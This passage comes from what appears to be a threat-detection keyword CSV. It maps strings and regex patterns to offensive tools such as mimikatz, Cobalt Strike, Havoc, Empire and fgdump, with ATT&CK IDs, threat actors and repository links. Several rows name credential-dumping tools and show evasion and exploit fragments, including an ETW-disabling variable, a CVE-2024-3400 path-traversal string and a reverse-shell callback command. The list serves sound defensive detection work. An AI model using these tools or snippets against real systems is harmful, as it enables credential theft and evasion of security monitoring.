T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*serverscan64 *",".{0,1000}serverscan64\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*serverscan64 *tcp*",".{0,1000}serverscan64\s.{0,1000}tcp.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*serverscan86 *",".{0,1000}serverscan86\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*Server-Side-Request-Forgery-Payloads.*",".{0,1000}Server\-Side\-Request\-Forgery\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*service/executable/",".{0,1000}service\/executable\/","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","683","115","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" "*service/executable/compile.exe*",".{0,1000}service\/executable\/compile\.exe.{0,1000}","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","683","115","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" "*service::me*",".{0,1000}service\:\:me.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*service::preshutdown*",".{0,1000}service\:\:preshutdown.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*service::remove*",".{0,1000}service\:\:remove.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*service::resume*",".{0,1000}service\:\:resume.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*service::shutdown*",".{0,1000}service\:\:shutdown.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*service::start*",".{0,1000}service\:\:start.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*service::stop*",".{0,1000}service\:\:stop.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*service::suspend*",".{0,1000}service\:\:suspend.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*service_permissions_escalate.rb*",".{0,1000}service_permissions_escalate\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ServiceHavoc.exe",".{0,1000}ServiceHavoc\.exe","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*servicemove*hid.dll*",".{0,1000}servicemove.{0,1000}hid\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","277","46","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" "*serviceName = *""KrbSCM""",".{0,1000}serviceName\s\=\s.{0,1000}\""KrbSCM\""","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*ServiceName*CorpVPN*",".{0,1000}ServiceName.{0,1000}CorpVPN.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*ServiceName'>KrbSCM*",".{0,1000}ServiceName\'\>KrbSCM.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","servicename","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*services/p2p.Handle(): Wrote SMB fragment *",".{0,1000}services\/p2p\.Handle\(\)\:\sWrote\sSMB\sfragment\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*servpw.exe*",".{0,1000}servpw\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*servpw64.exe*",".{0,1000}servpw64\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*SESSID=../../../../*",".{0,1000}SESSID\=\.\.\/\.\.\/\.\.\/\.\.\/.{0,1000}","offensive_tool_keyword","POC","CVE-2024-3400 exploitation attempt","T1210.001 - T1068 - T1190","TA0001 - TA0002","N/A","N/A","Network Exploitation Tools","https://x.com/HackingLZ/status/1780239802496864474","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*SessionGopher*",".{0,1000}SessionGopher.{0,1000}","offensive_tool_keyword","SessionGopher","SessionGopher is a PowerShell tool that finds and decrypts saved session information for remote access tools. It has WMI functionality built in so it can be run remotely. Its best use case is to identify systems that may connect to Unix systems. jump boxes. or point-of-sale terminals.","T1081 - T1087 - T1119","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Arvanaghi/SessionGopher","1","1","N/A","N/A","10","1159","166","2022-11-22T21:33:23Z","2017-03-08T02:49:32Z" "*SessionGopher.ps1*",".{0,1000}SessionGopher\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*set * virus_scanner*",".{0,1000}set\s.{0,1000}\svirus_scanner.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*set AutoRunScript multi_console_command -rc /root/*.rc*",".{0,1000}set\sAutoRunScript\smulti_console_command\s\-rc\s\/root\/.{0,1000}\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","1026","137","2024-04-30T15:57:18Z","2021-08-16T17:34:25Z" "*set CertPath data/*",".{0,1000}set\sCertPath\sdata\/.{0,1000}","offensive_tool_keyword","empire","empire command lines patterns","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*set CollectionMethodAll*",".{0,1000}set\sCollectionMethodAll.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*set COMPlus_ETWEnabled=0*",".{0,1000}set\sCOMPlus_ETWEnabled\=0.{0,1000}","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*set havoc *",".{0,1000}set\shavoc\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*set hosts_stage*",".{0,1000}set\shosts_stage.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*set keylogger*",".{0,1000}set\skeylogger.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 